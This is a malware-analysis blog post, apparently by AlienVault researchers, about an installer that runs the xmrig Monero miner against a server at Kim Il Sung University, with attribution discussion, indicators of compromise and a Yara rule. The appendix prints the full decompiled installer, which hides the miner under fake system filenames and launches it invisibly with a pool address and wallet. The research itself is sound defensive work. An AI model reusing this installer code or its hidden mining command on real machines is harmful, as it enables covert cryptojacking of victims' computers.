New malware generating cryptocurrency for North Korea – AlienVault research

AlienVault labs recently analysed an application compiled on Christmas Eve 2017. It is an Installer for software to mine the Monero crypto-currency. Any mined currency is sent to Kim Il Sung University in Pyongyang, North Korea.

http://brn.firetrench.com

The Installer copies a file named intelservice.exe to the system. The filename intelservice.exe is often associated with crypto-currency mining malware. Based on the arguments it’s executed with, it’s likely a piece of software called xmrig.

It’s not unusual to see xmrig in malware campaigns. It was recently used in some wide campaignsexploiting unpatched IIS servers to mine Monero.

The Installer executes Xmrig with the following command:

“-o barjuok.ryongnamsan.edu.kp:5615 -u 4JUdGzvrMFDWrUUwY… -p KJU” + processorCount + ” -k -t ” + (processorCount -1)”

The installer passes xmrig the following arguments:

  • 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRy5YeFCqgoUMnzumvS is the address of the Monero wallet

  • barjuok.ryongnamsan.edu.kp is the mining server that would receive any mined currency. The ryongnamsan.edu.kp domain indicates this server is located at Kim Il Sung University.

  • The password, KJU, is a possible reference to Kim Jong-un

Why was this application created?

The hostname barjuok.ryongnamsan.edu.kp address doesn’t currently resolve. That means the software can’t send mined currency to the authors – on most networks.

It may be that:

  1. The application is designed to be run within another network, such as that of the university itself;

  2. The address used to resolve but no longer does; or

  3. The usage of a North Korean server is a prank to trick security researchers.

It’s not clear if we’re looking at an early test of an attack, or part of a ‘legitimate’ mining operation where the owners of the hardware are aware of the mining.

On the one hand the sample contains obvious messages printed for debugging that an attacker would avoid. But it also contains fake filenames that appear to be an attempt to avoid detection of the installed mining software.

If the software author is at KSU, they may not be North Korean. KSU is an unusually open University, and has a number of foreign students and lecturers.

Photo of KSU from exploredprk.com

Related Samples

We identified two other pieces of software which share some code:

These samples are even simpler, and may be:

  1. Earlier prototypes; or

  2. Software created by entirely different authors that copied code from the same location, for example a forum.

Based on the compilation string, initial upload location and French text – it’s likely the author of these two other samples is from Morocco. Therefore 2) may be the more likely scenario. Unless all three samples are a prank by Moroccan hackers.

Monero mining linked to North Korea attackers

There are previous reports of North Korean attackers mining Monero:

  • A group known as Bluenorroff mined Monero on compromised servers during an attempted theft from a bank; and

  • A group known as Andariel mined Monero on the network of a South Korean company they had compromised.

Whilst naming conventions differ somewhat between vendors, Bluenorroff and Andariel are generally considered part of a wider set of attackers known as Lazarus:

  • Bluenorroff are best known for the partially successful theft of $951 million from the Bank of Bangladesh.

  • Andariel are perhaps a later evolution of BlackMine mentioned above. They are notable for recent thefts from the South Korean Ministry of Defense.

  • Lazarus consists of a number of related groups of attackers. They are not the only “high-level” group of attackers with reported links to North Korea.

We have not identified anything linking our Installer to these attacks. The Lazarus attackers have capable developers, and craft their own malware from a library of low-level code. Given the amateur usage of Visual Basic programming in the Installer we analysed, it’s unlikely the author is part of Lazarus. As the mining server is located in a university, we may be looking at a university project.

Events in May 2017

When talking about North Korea and crypto-currencies it’s worth noting a particular timeline of events. All three of the following events occurred in May 2017 – suggesting a possible sudden central tasking to exploit crypto-currencies:

  1. The WannaCry ransomware attacks;

  2. First reported compromise of a BitCoin exchange (Bithumblinked to North Korea; and

  3. The first BitCoin mining inside North Korea, as reported by RecordedFuture.

Bitcoin Trading from North Korea

North Korea has a very small number of IP addresses assigned to it, which makes interesting events from such IP addresses more noteworthy.

One such IP address, 175.45.178.19, has been active on BitCoin trading sites:

This IP address is fairly notorious. It was used to control compromised web-servers in a set of 2014/2015 attacks linked to North Korea known as BlackMine. Given the small number of IP addresses assigned to North Korea it’s probably just a coincidental link. You can also see North Korean IPs torrenting a number of Top Gear series, with a particular fondness for documentaries by James May. Following a similar logic we can’t reliably say that North Korean attackers are big Top Gear fans, though it appears someone with internet access in the country is.

 

The IP overlap is not strong evidence that the same people executing the hacking operations are engaged in trading Bitcoin.

Conclusion

Crypto-currencies could provide a financial lifeline to a country hit hard by sanctions. Therefore it’s not surprising that universities in North Korea have shown a clear interest in cryptocurrencies. Recently the Pyongyang University of Science and Technology invited foreign experts to lecture on crypto-currencies. The Installer we’ve analysed above may be the most recent product of their endeavours.

Appendix

Additional indicators of compromise are available within our OTX Pulse.

File-Hashes

6a261443299788af1467142d5f538b2c

762c3249904a8bf76802effb54426655

42344bb45f351757e8638656e12a0135

File-Path

C:\Windows\Sys64\intelservice.exe

Yara Rule

rule nkminer_monero {

   meta:

       description = "Detects installer of Monero miner that points to a NK domain"

       author = "cdoman@alienvault.com"

       tlp = "white"

       license = "MIT License"

   strings:

       $a = "82e999fb-a6e0-4094-aa1f-1a306069d1a5" nocase wide ascii

       $b = "4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRy5YeFCqgoUMnzumvS" nocase wide ascii

       $c = "barjuok.ryongnamsan.edu.kp" nocase wide ascii

       $d = "C:\\SoftwaresInstall\\soft" nocase wide ascii

       $e = "C:\\Windows\\Sys64\\intelservice.exe" nocase wide ascii

       $f = "C:\\Windows\\Sys64\\updater.exe" nocase wide ascii

       $g = "C:\\Users\\Jawhar\\documents\\" nocase wide ascii

   condition:

       any of them

}

Yara rules for xmrig are available here

Decompiled Code of 6a261443299788af1467142d5f538b2c

using System;

using System.Diagnostics;

using System.IO;

using System.Runtime.CompilerServices;

using Microsoft.VisualBasic;

using Microsoft.VisualBasic.CompilerServices;

 

namespace ConsoleApp5

{

   // Token: 0x02000008 RID: 8

   [StandardModule]

   internal sealed class Module1

   {

       // Token: 0x0600000F RID: 15 RVA: 0x00002128 File Offset: 0x00000328

       [STAThread]

       public static void Main()

       {

           Console.WriteLine(“Aucun argument”);

           char[] array = “ABDCEFGHIJKLNMOPQRSTVUWXYZ”.ToCharArray();

           char[] array2 = “0123456789”.ToCharArray();

           Random random = new Random();

           string text = string.Empty;

           while (text.Length < 6)

           {

               if (random.Next(0, 2) == 0)

               {

                   text += Conversions.ToString(array[random.Next(0, array.Length)]);

               }

               else

               {

                   text += Conversions.ToString(array2[random.Next(0, array2.Length)]);

               }

           }

           Console.WriteLine(text);

           if (!Directory.Exists(“C:\\Windows\\Sys64”))

           {

               Directory.CreateDirectory(“C:\\Windows\\Sys64”);

           }

           if (!Directory.Exists(“C:\\SoftwaresInstall”))

           {

               Directory.CreateDirectory(“C:\\SoftwaresInstall”);

           }

           if (!File.Exists(“C:\\Windows\\Sys64\\updater.exe”))

           {

               File.Copy(“licence/key.dat”, “C:\\Windows\\Sys64\\updater.exe”);

           }

           if (!File.Exists(“C:\\Windows\\Sys64\\intelservice.exe”))

           {

               File.Copy(“licence\\licence.dat”, “C:\\Windows\\Sys64\\intelservice.exe”);

           }

           File.Copy(“setup\\update.exe”, “C:\\SoftwaresInstall\\soft” + text + “.exe”);

           object objectValue = RuntimeHelpers.GetObjectValue(Interaction.CreateObject(“WScript.Shell”, “”));

           objectValue = RuntimeHelpers.GetObjectValue(Interaction.CreateObject(“WScript.Shell”, “”));

           object objectValue2 = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(objectValue, null, “SpecialFolders”, new object[]

           {

               “Desktop”

           }, null, null, null));

           object objectValue3 = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(objectValue, null, “CreateShortcut”, new object[]

           {

               Operators.ConcatenateObject(objectValue2, “\\shortcut.lnk”)

           }, null, null, null));

           NewLateBinding.LateSet(objectValue3, null, “TargetPath”, new object[]

           {

               NewLateBinding.LateGet(objectValue, null, “ExpandEnvironmentStrings”, new object[]

               {

                   “C:\\Windows\\Sys64\\updater.exe”

               }, null, null, null)

           }, null, null);

           NewLateBinding.LateSet(objectValue3, null, “WorkingDirectory”, new object[]

           {

               NewLateBinding.LateGet(objectValue, null, “ExpandEnvironmentStrings”, new object[]

               {

                   “C:\\Windows\\Sys64”

               }, null, null, null)

           }, null, null);

           NewLateBinding.LateSet(objectValue3, null, “WindowStyle”, new object[]

           {

               4

           }, null, null);

           NewLateBinding.LateCall(objectValue3, null, “Save”, new object[0], null, null, null, true);

           Process.Start(“C:\\SoftwaresInstall\\soft” + text + “.exe”, “”);

           Console.WriteLine(“The number of processors on this computer is {0}.”, Environment.ProcessorCount);

           int processorCount = Environment.ProcessorCount;

           Console.WriteLine(processorCount);

           int value = checked(processorCount – 1);

           string str = “KJU” + Conversions.ToString(processorCount);

           Process.Start(new ProcessStartInfo(“C:\\Windows\\Sys64\\intelservice.exe”)

           {

               WindowStyle = ProcessWindowStyle.Hidden,

               Arguments = ((“-o barjuok.ryongnamsan.edu.kp:5615 -u 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRy5YeFCqgoUMnzumvS -p ” + str + ” -k -t ” + Conversions.ToString(value)) ?? “”)

           });

       }

   }

}